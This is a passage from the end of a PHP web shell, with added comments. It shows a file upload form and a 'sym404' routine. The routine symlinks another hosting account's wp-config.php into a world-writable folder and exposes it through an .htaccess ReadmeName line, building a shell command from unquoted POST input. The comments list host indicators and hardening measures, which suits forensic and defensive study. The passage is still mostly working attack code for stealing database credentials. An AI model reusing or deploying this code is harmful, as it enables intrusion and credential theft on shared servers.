  1999. echo "<center><form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Explo17!'></form></center>";
  2000. }; }
  2001. elseif($_GET['do'] == 'sym404') {
        // sym404: symlink-based file disclosure on shared hosting. The form
        // defaults to another account's wp-config.php (database credentials).
        // Host indicators left by this branch: a "sym404" directory next to the
        // script (created with requested mode 0777), a symlink inside it that
        // points outside the web root, and sym404/.htaccess containing a
        // "ReadmeName" line.
        // Hardening commonly applied against this pattern: Apache
        // Options -FollowSymLinks or SymLinksIfOwnerMatch, limiting what
        // .htaccess may override, and PHP disable_functions / open_basedir.
  2002. echo '<center><form method="post"><br>File Target : <input name="dir" value="/home/user/public_html/wp-config.php">
  2003. <br>Save As: <input name="jnck" value="sym404.txt"><input name="ojaykan" type="submit" value="GasPol!"></form></center>';
  2004. if($_POST['ojaykan']){
        // rmdir() only removes an empty directory, so a previous run's contents
        // make it fail; no return value is checked anywhere in this branch.
  2005. rmdir("sym404");mkdir("sym404", 0777);
  2006. $dir = $_POST['dir'];
  2007. $jnck = $_POST['jnck'];
        // The link is attempted twice: through a shell command built by plain
        // concatenation of the POST values (no quoting), then through PHP's
        // symlink(); presumably so one still works if the other is disabled.
  2008. system("ln -s ".$dir." sym404/".$jnck);
  2009. symlink($dir,"sym404/".$jnck);
        // ReadmeName is the mod_autoindex directive that appends the named file
        // to a generated directory listing, which is how the linked file's
        // contents get displayed. The handle is never closed with fclose().
  2010. $inija = fopen("sym404/.htaccess", "w");
  2011. fwrite($inija,"ReadmeName ".$jnck);
  2012. echo'<center><a href="sym404/">Klik Gan >:(</a></center>';
  2013. }
  2014. }
  2015. ?>
  2016. </html>